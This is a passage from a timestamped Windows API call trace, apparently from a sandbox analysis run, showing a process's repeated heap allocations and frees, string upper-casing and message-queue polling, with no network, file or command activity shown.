RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fa8 [0145.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fc8 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaff8 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafc8 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f88 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab040 [0145.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f88 | out: hHeap=0x25c0000) returned 1 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1f88 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0145.468] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0145.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0145.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f88 | out: hHeap=0x25c0000) returned 1 [0145.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab040 | out: hHeap=0x25c0000) returned 1 [0145.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafc8 | out: hHeap=0x25c0000) returned 1 [0145.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaff8 | out: hHeap=0x25c0000) returned 1 [0145.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fc8 | out: hHeap=0x25c0000) returned 1 [0145.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaff8 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0145.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaff8 | out: hHeap=0x25c0000) returned 1 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaff8 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafc8 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fc8 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4550 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab040 [0145.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1f88 [0145.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab040 | out: hHeap=0x25c0000) returned 1 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b45f0 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab040 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab028 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fe8 [0145.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaff8 | out: hHeap=0x25c0000) returned 1 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4618 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fd8 [0145.469] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4618 | out: hHeap=0x25c0000) returned 1 [0145.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fd8 | out: hHeap=0x25c0000) returned 1 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaff8 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1fd8 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab118 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2008 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1ff8 [0145.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1ff8 | out: hHeap=0x25c0000) returned 1 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab160 [0145.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab0d0 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4618 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab100 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2008 [0145.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab100 | out: hHeap=0x25c0000) returned 1 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4640 [0145.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab100 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1c0 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab178 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1ff8 [0145.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab178 | out: hHeap=0x25c0000) returned 1 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4668 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab178 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab190 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2018 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4690 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1d8 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2028 [0145.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1d8 | out: hHeap=0x25c0000) returned 1 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b46b8 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1d8 [0145.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab250 [0145.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4668 | out: hHeap=0x25c0000) returned 1 [0145.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1ff8 | out: hHeap=0x25c0000) returned 1 [0145.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab178 | out: hHeap=0x25c0000) returned 1 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4668 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab178 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1ff8 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab208 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2038 [0145.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2038 | out: hHeap=0x25c0000) returned 1 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2038 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab220 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab220 | out: hHeap=0x25c0000) returned 1 [0145.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0145.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2038 | out: hHeap=0x25c0000) returned 1 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2038 [0145.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2038 | out: hHeap=0x25c0000) returned 1 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2038 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab220 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0145.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab280 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab298 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2068 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2c8 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2068 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2e0 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2068 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2f8 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2068 [0145.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab298 | out: hHeap=0x25c0000) returned 1 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2c8 | out: hHeap=0x25c0000) returned 1 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab280 | out: hHeap=0x25c0000) returned 1 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0145.472] lstrlenW (lpString="20") returned 2 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2f8 | out: hHeap=0x25c0000) returned 1 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab268 | out: hHeap=0x25c0000) returned 1 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2048 [0145.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab220 | out: hHeap=0x25c0000) returned 1 [0145.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0145.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2038 | out: hHeap=0x25c0000) returned 1 [0145.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab268 | out: hHeap=0x25c0000) returned 1 [0145.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.473] PeekMessageW (in: lpMsg=0x8beb70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beb70) returned 0 [0145.473] PeekMessageW (in: lpMsg=0x8beb70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beb70) returned 0 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2038 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab220 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2068 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2f8 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab280 [0145.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2e0 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0145.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2c8 [0145.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0145.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab298 [0145.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0145.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab280 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2f8 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2c8 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0145.474] lstrlenW (lpString="31") returned 2 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab298 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab220 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2038 | out: hHeap=0x25c0000) returned 1 [0145.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0145.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab220 [0145.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2038 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab268 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab220 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2038 | out: hHeap=0x25c0000) returned 1 [0145.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0145.474] PeekMessageW (in: lpMsg=0x8beb70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beb70) returned 0 [0145.474] PeekMessageW (in: lpMsg=0x8beb70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beb70) returned 0 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2038 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab220 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab298 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2068 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0145.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2c8 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2068 [0145.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2e0 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2068 [0145.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2f8 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2068 [0145.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab280 [0145.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0145.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab298 | out: hHeap=0x25c0000) returned 1 [0145.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2c8 | out: hHeap=0x25c0000) returned 1 [0145.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0145.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0145.476] lstrlenW (lpString="20") returned 2 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2f8 | out: hHeap=0x25c0000) returned 1 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab280 | out: hHeap=0x25c0000) returned 1 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab268 | out: hHeap=0x25c0000) returned 1 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0145.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2048 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab220 | out: hHeap=0x25c0000) returned 1 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2038 | out: hHeap=0x25c0000) returned 1 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab268 | out: hHeap=0x25c0000) returned 1 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.476] PeekMessageW (in: lpMsg=0x8beb70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beb70) returned 0 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0145.476] PeekMessageW (in: lpMsg=0x8beb70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beb70) returned 0 [0145.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0145.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0145.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab268 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1c0 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab100 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4640 | out: hHeap=0x25c0000) returned 1 [0145.477] 